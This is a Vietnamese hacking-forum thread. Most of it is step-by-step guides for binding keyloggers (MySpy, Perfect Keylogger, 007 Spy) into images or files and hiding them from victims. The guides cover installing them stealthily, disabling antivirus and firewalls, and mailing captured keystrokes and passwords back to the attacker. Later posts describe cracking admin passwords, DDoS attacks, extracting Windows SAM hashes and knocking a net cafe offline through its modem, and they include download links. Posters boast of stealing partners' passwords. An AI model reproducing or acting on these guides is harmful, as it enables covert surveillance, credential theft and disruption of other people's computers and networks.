Các bạn chú ý ko hỏi trong đây nữa (Tránh spam và gọn topic nhằm tiện lợi hơn cho việc tìm kiếm)Chỉ post bài viết hay liên quan đến chủ đề thôi .Thank

Trước tiên, down Myspy về, tắt tất cả các soft diệt Virus, spy đi. Nhấp vào hình cái ĐẦU LÂU. Giao diện ban đầu là 1 điệu nhạc, nhấp vào BIGINNER ---> Next, ở dòng Please type your Yahoo ID các bạn gõ vào nick của mình (lưu ý là ko cần gõ @....) --->Next. Ở dòng select a file to bind, nhấn vào Picture (All types), chọn Browse, chọn 1 tấm hình bất kì (lưu ý là nên chọn tấm hình kích cỡ nhỏ cho dễ send file) --->Next --->Finish. Tấm hình làm ra sẽ xuất hiện trong thư mục AGENT. Lấy tấm hình đi dụ Victim, và con Myspy sẽ gửi về nằm trong cái nick mà mình chọn lúc nãy. Thời gian tối đa khoảng 1 ngày từ ngày Victim nhấp vào tấm hình, con Myspy sẽ gửi thông tin về hộp mail của mình. Các bạn có thể dụ Victim = cách send file hay làm 1 đường link. Tạo đường link thì cần 1 host free, mình sẽ chỉ các bạn tạo 1 host free = freewebs ở mục sau. CHÚC CÁC BẠN MAY MẮN !!!
http://www.freewebtown.com/quang031/MYSPY.rar


Mình sẽ hướng dẫn các bạn tạo 1 host free = http://www.freewebs.com

-Bước 1 : http://members.freewebs.com/
Tìm SigUp để tiến hành đăng ký
-Bước 2: Sau khi tìm được SigUp nhấp chuột vào và bắt đầu làm theo thứ tự sau:
+Choose a Username: Đánh tên đăng nhập của bạn
+Choose your Password: Đánh pass của bạn vào
+Retype your Password: Đánh lại pass
+Email Address: Địa chỉ email của bạn .
+Where did you hear about us?
Chọn Other.
+ I have read, fully understand: Click chuột đánh dấu chọn vào ô trống.
+Click chuột vào :NEXT STEP

Sang trang tiếp theo :
Có 2 nút :
I AGREE và EXIT

CLick vào I AGREE.

SAng trang tiếp theo:

Easy Site Builder Mode

HTML Mode

Có 2 nút nhỏ.Bạn chọn cái nào cũng được.
Sau khi click chọn 1 cái :
+Your Full Name: Bạn gõ 1 cái tên .Cái gì cũng được
+Site Category :Chọn Other


Tiếp đó nhấn NEXT STEP

Sang trang tiếp theo:
+Please take your time to check out our interesting offers

Nhấp chuột luôn No Thank.

GOOD LUCK
ST trumcuoi

dowload chỗ nào vậy
chương trình này chẳng khác nào xpcspy cả , có lẽ là cải tiến lại , chức năng giống hệt hà

xài cái cũ có vẻ đơn giản hơn
có ai muốn dùng ko

2.35MB dowload (http://www.regnow.com/softsell/visitor.cgi?affiliate=21807&action=site&vendor=8313&ref=http://www.monitoring-software.biz/download/xpcspyp.exe)
1.18MB dowload (http://www.regnow.com/softsell/visitor.cgi?affiliate=21807&action=site&vendor=8313&ref=http://www.monitoring-software.biz/download/xpcspy.exe)

giải nén rất dễ dàng và dễ sử dụng , bà con tự mò đi và nhớ phá băng khi cài đặt nhé ....hồi trước tui dùng trong tiệm net để hack pass yahoo của bồ và pass MU của mấy thằng , có lẽ bây giờ vẫn xài dc

sưu tầm


THẾ GIỚI KEYLOG RẤT ĐA DẠNG, NHƯNG DƯỚI ĐÂY LÀ MỘT TRONG NHỮNG CON KEYLOG XẾP VÀO LOẠI NGUY HIỂM BẬC NHẤT ĐƯỢC NHIỀU CÁC HACKER SỬ DỤNG NHẤT HIỆN NAY

1)_ Perfect Keylogger V 1.62 con này cool đúng như tên gọi của nó, ngoài ra còn có khả năng ghi bàn phím ảo theo kiểu chụp click chuột chức năng tốt, dùng rất tốt ghi tấn tập chung tấn công 1 mục tiêu xác định, nhưng phân tích đựoc một cái pass click bằng chuột thì hơi oải.(ko qua được tường lửa)

2)_ SC-Keylogger Pro V3.2 về chức năng thì con này tuyệnt nhất, log cũng dễ đọc nhưng mỗi tội hay lỗi khi cài đặt, tỉ lệ thành công là 40% (tùy theo cấu hình của máy v vv......) (ko qua được tường lửa)

3)_ Backlogger 2.0

4)_ 007 Spy Software con này ghi tốt, gửi mail rất ổn định nhưng log của nó hơi khó đọc, ẩn tốt, có khả năng remote intalls nhưng mình chưa thử bao giờ

5)_Ardamax 2.42 con này cũng ghi bàn phím ảo rất tốt, log dễ phân tích, ẩn rất tốt, có khả năng gỡ bỏ anti khi đã cài đặt thành công

6)_Win-spy 8.8 pro còn này cũng very cool, ẩn tốt, gỡ bỏ anti và vô hiệu hóa tường lửa(rất cool)


BẮT TAY VÀO VẤN ĐỀ CHÍNH NÀOOOOO....!!!!!!!


1) PERFECT KEYLOGER V1.62

Trong các loại Keylogger thì PERFECT KEYLOGGER 1.62 là loại thông dụng nhất . Phương pháp cài đặt của nó có phần phức tạp ; nhưng bạn nào đã cài đặt thành công nó thì hầu như các loại p/m keylogger khác đều tương tự và cài đặt dễ dàng .

Giới thiệu với các bạn Percfect Keylogger V1.62 là 1 trong 10 con keyloger nguy hiểm nhất ;( Xếp hạng thứ tư là Perfect Keylogger – "gián điệp" này có khả năng ghi lại các ký tự nhập từ bàn phím, các mật khẩu, số thẻ tín dụng.) Các file log của nó gửi về Email cho chủ nhân rất dễ phân tích và truy cứu số liệu . Nếu download được phiên bản mới nhất và cài đặt đúng phương pháp thì nó có thể lấy được pass của các cách sử dụng qua “bàn phìm ảo”.
Đặc điểm của Perfect Keylogger 1.62 là nó tạo ra được file Remote Install với dung lượng nhỏ (khoảng 200kb) Chúng ta có thể cho file này ẩn nấp (nhúng vào , *****g ghép ) dưới rất nhiều dạng File để dụ Victim vào bẩy.(exe ; Image ; Mp3 ; Steath Icon ) .Cách dùng Perfect Keylogger này rất hiệu quả và thông dụng . Tuy nhiên vì tính chất " nguy hiểm và bén nhạy" của nó mà hiện nay nó bị hầu hết các loại AntiVirus có tiếng tăm loại trừ hẳn . tuy nhiên với các bác chơi keylog nhà ta bây giờ mà muốn setup ngoài quán nét thì kiểu gì cũng phải phá bỏ cái deepfreezer. thế nên theo mình con này dùng là tuyệt vời nhất. Cách cài đặt và sử dụng sẽ được giới thiệu sau đây :

sau khi run file exe ta sẽ thấy một màn hình sau đâyhttp://www.freewebs.com/hands_at/images/PerfectKeylogger.jpg
Chọn next để tiếp tục
Sau đó là màn hình
http://www.freewebs.com/hands_at/images/PerfectKeylogger1.jpg
Chọn Yes nhấn Next để tiếp tục :
http://www.freewebs.com/hands_at/images/PerfectKeylogger2.jpg
Keyword : Cac ban chon mot cai ten sao cho Victim khi tim ra phai lung tung lua chon de DEL ; thi du : YahooWXC hay WinLogon hay NortonFind ; hay OfficeXP v.v… ; noi chung la tuy y .
http://www.freewebs.com/hands_at/images/PerfectKeylogger3.jpg
Cac ban change dia chi de setup vao (rat quan trong de an nap) theo toi chon :
C:\Program Files\Yahoo!\Messenger hay :
C:\WINDOWS\system hay
C:\Program Files\Common Files\Microsoft Shared\DAO
Nhung dia chi nay Victim rat kho phat hien .
Ở bước này bạn chọn check box số 2 là : Stealth Installation .(để không có bảng báo cáo trong "add remove program"
Phần còn lại bam next tiếp tục .
Cac thao tac ke tiep de setup cac ban biet roi , cuoi cung la dien Usename vas pass cua chuong trinh vao bang Registration

Sau đây là cách để bạn thao tác với control panel :

Bạn chú ý hình này ở phía cuối góc phải màn hình
http://www.freewebs.com/hands_at/images/PerfectKeylogger4.jpg
Click chuột phải chọn Options.
vào màn hình đâu tiên Seting lại các dữ liệu như:
http://www.freewebs.com/hands_at/images/PerfectKeylogger5.jpg
Sho/hide program Icon : Chon phim tat de goi chuong trinh ra
Ví dụ : Ctrl + Alt + L .hoặc v..v…(Bạn phải nhớ phím tắt này nếu không thì không gọi nó ra được để tạo file Remote Install)
Chọn check box Run on windows startup để pbk khởi động khi win chạy
Chọn check box Don't show program icon at startup để ẩn cái icon của chưong trình trong danh muc những chương trình khởi động
Show / hide program icon :Chọn phím tắt để làm ẩn hay hiện ra chương trình ,cái icon ở khay icon sẽ hiện ra hay ẩn đi khi nhấn tổ hợp phím, Bạn nên đặt một phím tắt bí mật của riêng bạn.
Hide program from Ctrl+Alt+Del :Bạn hãy đánh dấu vào ô này để ẩn tên chương trình hiện ra trong Task Manager (nên chọn)
mấy cái còn lại bạn chọn cũng được, kô cũng đựoc

Tiếp tục :
http://www.freewebs.com/hands_at/images/PerfectKeylogger6.jpg
Set Password : dien pass de mo chuong trinh
Khong chon : Monitor only……….
Chọn hết tất cả các check box tại log này
http://www.freewebs.com/hands_at/images/PerfectKeylogger9.jpg
Khong nen chon Capture man hinh (Bo tat ca cac dau kiem)
File hình ảnh chỉ làm Mail gửi về có dung lượng cao . Nhưng đối với các bàn phím ảo thì nó rất hiệu quả khi ta chỉ cần đánh Victim trong vài ngày là rút lui bí mật .
http://www.freewebs.com/hands_at/images/PerfectKeylogger7.jpg
chọn thời gian mỗi lần keylog ghi nhận rồi send back lại cho bạn log : ví dụ mình chọn send về 1 mail sau mỗi 30 phut
Chon send log only ………… thi du : 100 kb .
Nhấn qua Deliever để điền mail .
bạn điền email bạn vào
http://www.freewebs.com/hands_at/images/PerfectKeylogger8.jpg
Đây là phần cài đặt các thông số để con Keylogger tự động gửi Email về cho chủ nhân nó . Rất nhiều bạn đã lúng túng không biết lấy các thông số này từ đâu và thường bị thất bại tại bước này . Các bạn chú ý từng thao tác nhé :
Tại bảng này bấm vào "Email" bên trái bảng >
http://www.freewebs.com/hands_at/images/PerfectKeylogger6.jpg
bấm vào Delivery Bảng mới này hiện ra >
http://www.freewebs.com/hands_at/images/1s.png
Send to : Điền địa chỉ Email bạn muốn nó gửi về
http://www.freewebs.com/hands_at/images/2s.png
Username và password :điền của địa chỉ email đã điiền trên .(Nên dùng Mail gửi và nhận cùng 1 địa chỉ )
http://www.freewebs.com/hands_at/images/4s.png
SMTP : phần này rất quan trọng (rất nhiều người thắc mắc)
http://www.freewebs.com/hands_at/images/3.png
ở đây tôi nêu cho các bạn gmail (Nên chọn GMAIL để gửi và nhận thư ) và tuyệt đối ko chọn yahoomail hay hostmail (ko hỗ trợ 2 loại này)
GMAIL :
gsmtp183.google.com
gsmtp163.google.com
gmail-smtp-l.google.com
alt2.gmail-smtp-in.l.google.com
alt1.gmail-smtp-in.l.google.com
=>=> bọn gmail này đảm bảo dùng rất cool , Ít khi bị kẹt Mail trên Server .
Chọn một trong những địa chỉ SMTP này để đièn vào ô tương xứng . Điều quan trọng ở đây là Gmail chỉ gửi cho Gmail và yahoo mail chỉ gửi được cho yahoo mail.
Authentication : chọn NON
Bấm vào Send test để thử .Nếu thành công các bạn sẽ được thông báo như sau :

http://www.freewebs.com/hands_at/images/5.png
Về việc chọn option trên FTP thì mình chưa dùng bao giờ, theo mình nên gửi log theo mail là cool nhất(tránh trường hợp host die)
Tiếp theo : Tạo file Remote Install
TẠO FILE REMOTE INSTALL
(Chỉ trong vòng 10 giây con Keylogger đã được setup vào máy hoặc Victim chỉ cần kích vào là ta đã thành công)
Tại phía dưới bên phải màn hình > kích phải vào biểu tượng hình cuộn phim > chọn Remote Installation
http://www.freewebs.com/hands_at/images/PerfectKeylogger4.jpg
http://www.freewebs.com/hands_at/images/6.png
Bấm NEXT để tiếp tục :(chọn đúng như trong ảnh)
http://www.freewebs.com/hands_at/images/7.png
Bấm NEXT để tiếp tục :
http://www.freewebs.com/hands_at/images/8s.png
Bấm vào : BROWSE để chỉ file dẫn cho con keylogger nhúng vào . Có thể chọn file EXE hay file nhạc v.v..
Bấm NEXT > NEXT > Finish .
File mới được tạo ra có tên đầu là : inst+tên gốc của file dẫn , Ta có thể đổi tên file này lại tùy ý .
http://www.freewebs.com/hands_at/images/9.png
Dùng file này để gửi đến Victim hay mang ra hàng NET kíck đôi vào nó là ta đã cài đặt xong vào máy Victim >> Khi cài đặt thành công trong Email của các bạn se có 1 mail gửi đến báo thành công như sau :
http://www.freewebs.com/hands_at/images/SNAG-suc.jpg
CHỈ CẦN SEND FILE REMOTE CHO VICTIM VÀ LỪA VICTIM CLICK CHUỘT VÀO FILE ĐÓ LÀ MỘT CON VIRUS Y SÌ ĐÚC VỚI CON VIRUS BẠN ĐÃ THỬ CÀI Ở NHÀ ĐỰOC CÀI VÀO MÁY NẠN NHÂN. HOẶC ĐEM RA HÀNG NÉT TÙY BẠN


KHI CÀI ĐẶT VÀO MÁY VICTIM ĐÔI KHI KO THẤY FILE LOG GỬI VỀ ĐÔI KHI CÓ RẤT NHIỀU LI DO, NHƯNG NGUYÊN NHÂN CHÍNH ĐƯỢC TÔI LIỆT KÊ DƯỚI ĐÂY:
1---ĐƯỜNG DẪN CÀI ĐẶT KEYLOG VÀO MÁY VICTIM KO GIỐNG VỚI ĐƯỜNG DẪN MÌNH SETUP Ở NHÀ
2---MÁY VICTIM ĐỂ TƯỜNG LỬA
3---CÁC BẠN TỰ MÀY MÒ

VÀ NHỚ MỘT ĐIỀU RẰNG NẾU CÓ ĐEM CÁI CON REMOTED RA QUÁN NÉT THÌ NHỚ PHẢI DISABLE ANTIVIRUS ĐI ĐÃ NHÉ, SAU ĐÓ OFF LUÔN CÁI FIREWALL, CUỐI CÙNG BẠN PHÁ DEEP.
CHÚC CÁC BẠN LÀM ĂN NGON LÀNH,
SC-KEYlOGER PRO V3.2 (

LINKDOWLOAD .........(CÁI NÀY TỰ KIẾM NHÉ) AI LẤY BẢN CÓ SERIAL LÊN TIẾNG TÔI SHARE CHO




SETUP:

Kích đôi vào biểu tượng p/m , giao diện cài đặt đầu tiên quen thuộc

http://www.freewebs.com/hands_at/images/007/Setup007.jpg

Bạn bấm vào "Next" > chọn vào " I acept.."


http://www.freewebs.com/hands_at/images/007/Setup0071.jpg


Bấm "Next"


http://www.freewebs.com/hands_at/images/007/Setup0072.jpg




Bạn hãy chọn vào " Don't create any icon " P/m này sẽ không hiển thị tại các vị trí mà nó đã liệt kê trong bảng , diều này là cho Victim lúng túng khi truy tìm để diệt , rất có lợi cho chủ nhân con Keylogger . Bấm "Next" để tiếp tục .
Các bảng nhắc nhở quan trọng không nên bỏ qua :


http://www.freewebs.com/hands_at/images/007/Setup0073.jpg

http://www.freewebs.com/hands_at/images/007/Setup0074.jpg


Bấm vào "Install" để tiến hành cài đặt > Khi cài xong giao diện chính sẽ như sau :


http://www.freewebs.com/hands_at/images/007/Setup0075.jpg

Bạn hãy bấm vào " Register now" để diền user name và Key


http://www.freewebs.com/hands_at/images/007/Setup0076.jpg

Nếu thành công thì bạn sẽ có được thông báo như thế này :


http://www.freewebs.com/hands_at/images/007/Setup0077.jpg

Tiep theo >>>>>


"Tiếp theo"
Chọn paswword và phím nóng (lưu ý chọn khác với mặc định của nó) Ở phần password setup chúng ta điền pass của minh chọn vào để đảm bảo chỉ có 1 mình ta có thể vào được con spy , sau khi nhập pass vào thì nó sẽ hiện lên 1 bảng thong báo đã cài đặt pass thành công .
Sau khi cài đặt pass thành công : Sau khi cài xong pass chúng ta cần chú ý 1 phần cũng khá quan trọng đó là fím nóng để gọi con spy(mac dinh cua no la ;Shift+Ctrl+Alt+F7)


http://www.freewebs.com/hands_at/images/007/Setup0078.jpg

Bấm vào : Advanced Option để chỉnh cấu hình & cài đặt cho mail hay Fpt :
Chọn vào những Box mình muốn nó ghi nhận :
bây giờ ta sẽ đặt tuỳ chọn cho nó ok:
- send keystroke log: gửi những hoạt động trên bàn fím (đánh dấu vào)
- send application log : gửi cho những chương trình ứng dụng đã chạy (đánh dấu vào)
- send screen snapshot log : gửi ảnh chụp màn hình về cho bạn (phần này tui khuyên không nên đánh dấu vì nó sẽ ko gửi ảnh mà chỉ gửi link ảnh có trong máy mà thôi)
Phần này các bạn nên vào bảng giao diện tuỳ chỉnh chính , phía bên trái có biểu tượng ScreenShoots log và File/folder log . Kích phải vào nó de vô hiệu hoá , để con spy không ghi nhận các file ảnh và phần ghi nhận file and folder trong máy Victim , có thể tạo diều kiện cho Victim dẽ truy tìm .THực chất hai nhiệm vụ này chúng ta không cần thiết sử dụng trong báo cáo nó gửi về ,chỉ làm cho file kèm theo Mail dung lượng cao , dễ bị đọng lại trên server SMTP . Hiện tượng này các bạn thường thấy có khi nó ngưng gửi mail về 8-9 tiếng đồng hồ , nhưng cũng có khi nó gửi về lien tục và trùng lặp
- send websites log : gửi những web mà nạn nhân đã vào (đánh dấu vào)
- send files/foder log : gửi những link of của những files và thư mục mà victim đã vô (đánh dấu vào)
- send logs every: thời gian spy sẽ gửi mail 1 lần cho bạn . Nên để 2 giở là nó gửi về , vì thời gian ngắn quá làm lượng Mail chúng ta phải mở ra để kiểm nhiều lên , không khâm nổi khi mà mồi ngày phải mở và đọc 300 cái mail >OK. Nhưng đối với các máy có cài Deepfreeze thì ta nên để 30 đến 45 phút , vì có thể file log của ta chưa kịp gửi di thì đã bị Chủ NET Restar máy và bị biến mất
- clear all logs after deliver : xoá các logs đã gửi thành công chú ý nếu ko chon vào con spy sẽ gửi cả log cũ và mới lẫn lộn rất khó phân biệt
xong phần cấu hình bây giờ nhấn ok là xong , tao lại trở về giao diện ban đầu:

http://www.freewebs.com/hands_at/images/007/Setup00710.jpg

Điền Địa chỉ Email của mình vào :
- your Email : điền cái mail mà bạn cần nó gửi pass về
- subject : tiêu đề thư để bạn bít đây là mail của con spy theo tui bạn nên lập riêng 1 hộp mail chỉ để chứa pass là good nhất
- test now: để các bạn gửi thử trực tiếp về hộp mail của mình xem con spy có hoạt động good ko tui khuyên bạn nên thử nó 2 lần, sau khi thử xong nó sẽ hịên lên một bảng thông báo đã gửi thành công .
*chú ý: cái FPT thì ban nào có sài host có hỗ trợ fpt thì sài củng giống mail nhưng điền them cái id & pass của cái fpt vào là ok !


http://www.freewebs.com/hands_at/images/007/Setup00713.jpg

Bấm vào : Test now để kiểm tra , nếu thành công thì sẽ có bảng như sau :


http://www.freewebs.com/hands_at/images/007/Setup0079.jpg

Muốn không sử dụng chức năng gì > kích phải vào vị trí tương ứng :trong bang sau :


http://www.freewebs.com/hands_at/images/007/Setup00712.jpg

http://www.freewebs.com/hands_at/images/007/Setup007.jpg

http://www.freewebs.com/hands_at/images/007/Setup00711.jpg

===============================

Khái quát chung:[/B] cách sử dụng con này
Keylog nói chung là phần mềm ghi lại các thao tác bàn phím, đây là chức năng cơ bản của nó. Mặc dù sau này keylog càng ngày càng có thêm nhiều chức năng hơn nhưng đây vẫn là phần nhiệm vụ cơ bản nhất mà nó phải đảm bảo
Perfect keylog được đánh giá là 1 trong 10 keylog nguy hiểm nhất ! Nó khá hoàn hảo về các chức năng, dễ dàng trong cài đặt và sử dụng. Hiện nay phiên bản mới nhất là 1.63 !
Hôm nay tui sẽ hướng dẫn các bạn cách sử dụng từ cơ bản nhất đến 1 số chức năng ít người khai thác !

[B]II/ Download và cài đặt : sử dụng phiên bản 1.63, mở rộng cả 1.62

- Download Phiên bản 1.63: http://www.4shared.com/file/2495161/3db703...pk2003_163.html

Phiên bản 1.62: http://www.4shared.com/file/2495168/446bbb...pk2005_162.html

Chú ý nếu link trên die các bạn có thể tải trực tiếp từ website của keylog http://www.blazingtools.com/

http://www.blazingtools.com/downloads/i_bpk2003.exe


- Sau khi đã download về các bạn giải nén và tiến hành cài đặt.

http://img402.imageshack.us/img402/6096/14qp.jpg
Các bạn chạy file i_ipk...exe để tiến hành cài đặt:
http://img457.imageshack.us/img457/7996/38ps1.jpg

Cái này chỉ cần next thui. Chú ý đến phần Select program Folder bạn chọn đường dẫn đến thư mục sẽ cài đặt keylog vào. Có 2 lựa chọn cho việc cài đặt
http://img457.imageshack.us/img457/7996/38ps1.jpg
Regular installation: Cài đặt đầy đủ toàn bộ các file ( trợ giúp, remove ...)
Stealth installation: Chỉ cài các file cần thiết

Lời khuyên là bạn chỉ cần cài đặt ở chế độ Stealth installation !

Sau đó next tiếp và finish, như vậy quá trình cài đặt trên Pc đã xong. Keylog sẽ hiện lên 1 bảng thông báo Regis minder
http://img479.imageshack.us/img479/1824/41sf.jpg
Bạn chọn phần "Enter registration code" sau đó sử dụng serial trong thư mục giải nén ban đầu để đăng ký !
Điền vô rùi okie nó sẽ báo bạn đã đăng ký thành công, keylog thu về 1 biểu tuợng hình cuộn phim ở khay hệ thống !
http://img504.imageshack.us/img504/7037/50rq.jpg
http://img223.imageshack.us/img223/6947/68he1.jpg

Click chuột phải vô biểu tượng của keylog trong khay hệ thống ta thấy xuất hiện 1 bảng tùy chọn như sau:
http://img223.imageshack.us/img223/7919/75yz.jpg
View the log: xem những ghi chép của keylog đã thực hiện ở trên máy ở trên máy.
+ Enable logging : mở chức năng ghi chép ( đừng có bỏ phần đánh dấu đi làm j )
+ Hide program icon : ẩn biểu tượng của keylog ở khay hệ thống đi. Chú ý đến các phím tắt để gọi nó trở lại nghen
+ Password : đặt pw để bảo vệ keylog !
+Remote install: tạo file cài đặt để gửi đi.
+[b] Option: Cài đặt

Trong đó option là phần quan trọng nhất, các bạn nên thiết lập đầy đủ thông tin trong option trước khi làm bất kỳ điều gì khác ! Bắt đầu, bạn chọn phần option nó sẽ hiện lên như sau:
http://img223.imageshack.us/img223/714/81wx.jpg

General: tùy chọn chung
- System:
run on Windows startup ( tự động chạy mỗi khi win khởi động);
don't show grogram icon...( không hiển thị icon khi startup )
- Hotkey: phím nóng để gọi keylog lên trong khay hệ thống khi sử dụng chức năng tự ẩn đi của keylog, bạn có thể thay đổi tùy ý mình sao cho dễ nhớ là được !
- Invisibility: khả năng tự ẩn của key trong task manager

Trong phần này các bạn nên để toàn bộ các chế độ trên ! Như vậy là xong 1 option là general.


Logging: Tùy chọn các chức năng ghi chép, đặt pw bảo vệ... phần này không quan trọng lắm, các bạ tự tham khảo nếu không để mặc định cũng okie

Screenshot: Chức năng tự động chụp màn hình sau 1 khoảng thời gian ấn định sẵn, chất lượng file hình, kiểu chụp...

Email: đây là phần quan trọng các bạn chú ý. Nó sẽ giúp gửi các thông tin ghi chép, hình ảnh chụp được về cho chúng ta theo email ! Nhìn lên trên tui thấy có 2 tag là Scheduler và Delivery
- Delivery: cài đặt địa chỉ email. Nếu các bạn sử dụng mail server của keylog như mặc định thì chỉ cần gõ địa chỉ email vô ô send to như vậy là được. Tuy nhiên nếu có mail server khác ổn định hơn thì bạn có thể sử dụng mailserver này bằng cách đánh dấu vào ô Use mail acc to send email và sau đó điền đầy đủ thông tin của mail acc vào
Lời khuyên, nếu các bạn không chắc chắn về SMTP, port .. thì tốt nhất chỉ cần điền địa chỉ email của mình vào phần Send to thôi
Sau khi điền xong các bạn chọn Send test ! Keylog sẽ gửi 1 bức mail kiểm tra đến hòm mail bạn đã điền. Nếu thông báo Send thành công tức là email đã được gửi đi.
Thông thường bạn nên chọn Gmail thì tốt hơn và đôi khi có thể gặp trục trặc khi không thể kết nối được với server !
- Scheduler: Lên lịch cho keylog để gửi ghi chép về qua mail ( chú ý đánh dấu vào ô try to send logs... ) Các tùy chọn là do bạn: thời gian gửi mỗi lần, dung lượng mail gửi đi, gửi ghi chép gồm những gì ( hình ảnh, chat logs,...)


FTP: Đây là chức năng giúp keylog gửi ghi chép về trên host của bạn dưới dạng các file htm và file hình ảnh ...Đây là một chức năng khá hay, tỷ lệ gửi thành công cao tuy nhiên rất ít người dùng nó. Alex khuyến khích các bạn sử dụng cái này thay vì send email, tỷ lệ gặp trục trặc rất cao !
Yêu cầu là có 1 host hộ trợ ftp upload ! Bạn điền đầy đủ thông tin về host như hostname ( ex: ftp://yahoo69.com )
user và pw + port để đăng nhập
Ai đã sử dụng các phần mềm ftp upload thì sẽ rõ những thông tin này thôi

Alerts: Bạn có thể tạo 1 list các ký hiệu, từ ngữ ... mà khi keylog ghi lại được nó sẽ lập tức thông báo lại cho bạn ! <== ít xài

Targets: Mặc định là keylog sẽ ghi lại toàn bộ hoạt động, tuy nhiên bạn có thể chọn theo dõi 1 vài chương trình nào đó bằng cách đẩy dấu chọn xuống "Enable logging in the following..." sau đó chọn đường dẫn đến file cần theo dõi hoạt động hoặc add title của chương trình vào !

Ok, vậy là xong phần cài đặt vui vẻ nhá ! 1 phần quan trọng là remote install có lẽ phải post sau... đêm đã về khuya ..

III/ Tạo file remote install:

Đây là chức năng cho phép bạn tạo file cài đặt và gửi đi cho victim, khi Victim download về trên máy thì keylog sẽ tự động cài đặt trên pc của nạn nhân !

Sau khi cài đặt xong và bạn thấy keylog hoạt động ổn định, đạt yêu cầu ==> chuẩn rùi thì tạo file remote install !

Tại biểu tượng keylog ở khay hệ thống, click chuột phải vào chọn "Remote Installation " ==> Hiện lên bảng "Welcome to the remote installation wizard" bạn chọn next để tiếp tục !

+ "Select the pạckage actions" :

Trong phần what do you want to do ? Có 2 tùy chọn ở trên là tạo file remote để cài đặt mới keylog trên các pc nhận file remote này, lựa chọn thứ 2 ở dưới là tạo file remote để tháo gỡ keylog đã cài trên máy nạn nhân !
Bạn chọn ô trên để tạo file cài đặt !

Ở dưới là Notify me when the remote installation package will be launch => để dấu chọn vào đây keylog sẽ gửi thông báo cho bạn khi đã cài đặt thành công trên pc của victim bằng email hoặc ftp !

Tùy chọn cuối cùng để file remote tự đóng các soft antikeylog, firewall,.. khi hoạt động !

chon xong bạn next để qua bước tiếp theo

+ "Specify deployment package options":

Specify the file to combine with the keylog: bạn chọn đường dẫn đến 1 file bất kỳ để kẹp chung với keylog ( file gì cũng được )
Install to the following ...: bạn chọn đưòng dẫn đến thư mục mà keylog sẽ được install vào ( ví dụ C:\WINDOWS )

sau rùi next và finish là xong, file remote được tạo ra có tên là inst_xxx trong đó xxx là tên file bạn kẹp vô cùng keylog và nằm cùng thư mục với file này !

Bạn có thể upload file này len host, attack vô email để gửi đi !


Trong options chọn Email

http://img356.imageshack.us/img356/7946/11qp1.jpg
Trong phần email nhìn lên trên có 2 lựa chọn Delivery và Scheduler ! Bạn chọn Scheduler để thiết lập các thông số về lịch trình gửi email ( chú ý đánh dấu vào ô try to send logs... )

Try to send logs by email every ...hour ...minutes <== điền thời gian gửi vào ô đó !

Bạn nên sự dụng Acc của Gmail sẽ tốt hơn Yahoo trong việc nhận mail !
Nếu có host thì nên dùng chức năng ftp thay vì email
http://www.freewebtown.com/kubachkim/i_bpk2005_162.zip
Yêu cầu bạn k0 dc giới thiệu link đến web cá nhân.Nếu còn tại phạm sẽ bị banned 7 ngày.
Ký tên :xXxHackerxXx

Cách 1: Hack Pass, có nghĩa là chôm được pass của admin or MOD và vào chọc ngoáy theo ý mình. Có rất nhiều cách để chôm pass nhưng có một chương trình mà SV chúng ta hay sử dụng đó là Webcrack ( Down về từ http://webcrack.home.ml.org/ )
Đừng có dùng để làm chuyện mờ ám nhé :gaicam:

Cách 2: Cách này tương tự như kiểu bomb thư mà ta hay dùng tức là làm treo Website bằng những user ảo (có thể lên đến 10.000 ) bằng kỹ thuật Distributed Denial Of Service , Mục đích của cách này là làm trang Web ngưng trệ trong một thời gian nhất định chứ ko thể thay đổi được nội dung Website chứ chưa nói đến chuyện cướp domain (cùng một lúc có 10.000 người truy cập vào không treo mới là chuyện lạ) . Các bạn có thể dùng chương trình Smurf để thực hiện...hoặc nhiều chương trình khác.

Cách 3: Hack Domain, Cách này tôi cũng chỉ mới nghe mấy tay "có máu mặt" nói chuyện (mình chưa đủ trình độ .. hè hè) . Hình như 3 năm trước (Soulevil còn bé tí tẹo) forum Viethacker và Hackervn oánh nhau , các hacker dùng cách này --> kết quả một bên ngỏm củ tỏi còn một bên tạm ngưng hoạt động trong một thời gian. Bác nào biết hack bằng cách này post bài cho anh em học hỏi đi

vì lý do thời gian nên không post link mong các bạn thông cảm
có hai cách : cách cổ ổ xỉ là dung cd boot để lấy file sam và system trong thư mục c\windows\system32\config nếu dùng NTFS thì dùng cd boot có hổ trợ NTFS(hireen boot 8.0 trở lên) nhưng cach tôi chr sau đây ko cần hireen boot
ko cần vào dos :
công cụ : saminside (tìm trên gooooogle)
một chương trình phục hồi dử liệu(PHDL)
lổ hỏng của winxp à chỉ quản lí tập tin nên ta có thể tấn công vào secsion
chạy chương trìng PHDL và tim đến c\windows\system32\config và bạn sẻ phục hồi 2 file sam va system vào ổ khác chạy saminside chọn import 2 file đó và nhấn nut play để nó phân tích :beer: :covietnam:

theo tui thì dùng Hiren's Boot là hay nhất đợ rắc rối chương trình saminside mà không phân tích ra cái gì thì thui rùi, bản mới nhất là 8.2 có nhiều chức năng mới lắm
nhưng mà cái Hiren's Boot theo mình biết thì nó xóa cả pass cũ đi đó nếu mà để hack thì cũng không thật sự tôi iu lắm đó
nhưng mà hack là không tôt đâu nên trong sach một tí hihi...:khongduocphep:

mà sao bạn nói nhát gừng thế lần sau post bài nói cho hết cặn kẽ để anh em còn biết

à quên đây là bản saminside mình đã tìm được cho ai muốn dowload nhé
Home:
http://www.insidepro.com/

Download: 0.482 MB (APP + FIX) http://rapidshare.de/files/25271684/SAMInside.v2.5.6.2-YAG.rar.html
Password: www.devilived.com


chúc vui vẻ

:still_dreaming: Trong khi mọi người đang say sưa nghe nhạc, chơi games online. Bạn nhẹ nhàng click chuột và thế là cả một tiệm Net chưởi gầm lên chỉ vì bị rớt mạng (tất nhiên là họ ko biết do bạn làm đâu ). :burn_joss_stick:

++Máy tính và ISP (nhà cung cấp dịch vụ) kết nối dc với nhau là thông qua Modem, vậy nếu ta là hư dc Modem thì dĩ nhiên, nó sẽ bị rớt mạng.

++Đầu tiên, ta cần xác định dc tên MODEM. Nếu chủ tiệm Net để MODEM cho bạn thấy rõ (trên bàn chẳng hạn) thì thật là tuyệt.
Biết tên MODEM, chúng ta sẽ có dc username và password để truy cập vào web cấu hình MODEM đó. Từ đó, chúng ta sẽ phá nó !!!

++Nhưng nếu chúng ta ko thấy dc MODEM thì chúng ta sẽ làm như sau:

Vào Start > Control Panel > Network Connections > nhấn dupe chuột vào Local Area Connection > chọn Propertises > chọn Internet Protocol (TCP/IP) > Propertises > Sau đó, bạn lần lượt chọn Obtain an IP & Obtain DNS Server .

